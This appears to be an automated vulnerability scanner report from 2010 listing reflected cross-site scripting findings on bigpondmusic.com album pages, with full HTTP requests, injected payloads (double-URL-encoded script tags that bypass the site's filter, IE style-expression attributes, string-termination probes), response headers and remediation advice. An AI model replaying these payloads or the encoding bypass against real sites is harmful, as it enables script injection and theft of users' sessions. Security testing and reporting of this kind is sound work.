<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3413%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecef7e926d6b was submitted in the REST URL parameter 1. This input was echoed as c3413"><script>alert(1)</script>cef7e926d6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /albumc3413%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecef7e926d6b/massive-attack/atlas-air-ep HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:29:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88125
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9b33'%3ba641b115d06 was submitted in the REST URL parameter 1. This input was echoed as d9b33';a641b115d06 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /albumd9b33'%3ba641b115d06/massive-attack/atlas-air-ep HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:29:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87833
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f0a6"style%3d"x%3aexpression(alert(1))"8eeaf2aab30 was submitted in the h parameter. This input was echoed as 9f0a6"style="x:expression(alert(1))"8eeaf2aab30 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/massive-attack/atlas-air-ep?h=7647081059f0a6"style%3d"x%3aexpression(alert(1))"8eeaf2aab30 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:27:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 107499
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Massive Attack - Atlas Air E ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/massive-attack/atlas-air-ep?h=7647081059f0a6"style="x:expression(alert(1))"8eeaf2aab30" /> ...[SNIP]...
2.95. http://bigpondmusic.com/album/massive-attack/atlas-air-ep [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/massive-attack/atlas-air-ep
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0802"style%3d"x%3aexpression(alert(1))"d70ff86ab90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0802"style="x:expression(alert(1))"d70ff86ab90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/massive-attack/atlas-air-ep?f0802"style%3d"x%3aexpression(alert(1))"d70ff86ab90=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:27:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 107490
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Massive Attack - Atlas Air E ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/massive-attack/atlas-air-ep?f0802"style="x:expression(alert(1))"d70ff86ab90=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4b4e'%3baede1c38fe1 was submitted in the REST URL parameter 1. This input was echoed as c4b4e';aede1c38fe1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /albumc4b4e'%3baede1c38fe1/mike-posner/cooler-than-me3 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:24:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88147
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed7f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e883376e85ac was submitted in the REST URL parameter 1. This input was echoed as fed7f"><script>alert(1)</script>883376e85ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /albumfed7f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e883376e85ac/mike-posner/cooler-than-me3 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:24:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88125
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8f38"style%3d"x%3aexpression(alert(1))"76db599ad81 was submitted in the h parameter. This input was echoed as a8f38"style="x:expression(alert(1))"76db599ad81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/mike-posner/cooler-than-me3?h=694323401a8f38"style%3d"x%3aexpression(alert(1))"76db599ad81 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:24:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 105771
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Mike Posner - Cooler Than Me ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/mike-posner/cooler-than-me3?h=694323401a8f38"style="x:expression(alert(1))"76db599ad81" /> ...[SNIP]...
2.99. http://bigpondmusic.com/album/mike-posner/cooler-than-me3 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/mike-posner/cooler-than-me3
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b9d9"style%3d"x%3aexpression(alert(1))"39133f9d96c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9b9d9"style="x:expression(alert(1))"39133f9d96c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/mike-posner/cooler-than-me3?9b9d9"style%3d"x%3aexpression(alert(1))"39133f9d96c=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:22:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 105430
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Mike Posner - Cooler Than Me ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/mike-posner/cooler-than-me3?9b9d9"style="x:expression(alert(1))"39133f9d96c=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d31e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1e077d3c14 was submitted in the REST URL parameter 1. This input was echoed as d31e9"><script>alert(1)</script>c1e077d3c14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /albumd31e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1e077d3c14/nelly/5-0-deluxe HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:19:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87913
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c014'%3babb2e6a640f was submitted in the REST URL parameter 1. This input was echoed as 4c014';abb2e6a640f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album4c014'%3babb2e6a640f/nelly/5-0-deluxe HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:19:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88199
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c434d"style%3d"x%3aexpression(alert(1))"f7c0d253232 was submitted in the h parameter. This input was echoed as c434d"style="x:expression(alert(1))"f7c0d253232 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/nelly/5-0-deluxe?h=771623980c434d"style%3d"x%3aexpression(alert(1))"f7c0d253232 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:19:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 124979
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.103. http://bigpondmusic.com/album/nelly/5-0-deluxe [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/nelly/5-0-deluxe
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eeab"style%3d"x%3aexpression(alert(1))"e125ad515ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5eeab"style="x:expression(alert(1))"e125ad515ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/nelly/5-0-deluxe?5eeab"style%3d"x%3aexpression(alert(1))"e125ad515ce=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:19:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 124531
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e7a0'%3b8f38f26f47a was submitted in the REST URL parameter 1. This input was echoed as 5e7a0';8f38f26f47a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album5e7a0'%3b8f38f26f47a/nelly/just-a-dream2 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:19:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87890
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c1b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee4c93957b71 was submitted in the REST URL parameter 1. This input was echoed as 6c1b8"><script>alert(1)</script>e4c93957b71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album6c1b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee4c93957b71/nelly/just-a-dream2 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:19:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88200
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa568"style%3d"x%3aexpression(alert(1))"61488da52ac was submitted in the h parameter. This input was echoed as fa568"style="x:expression(alert(1))"61488da52ac in the application's response.
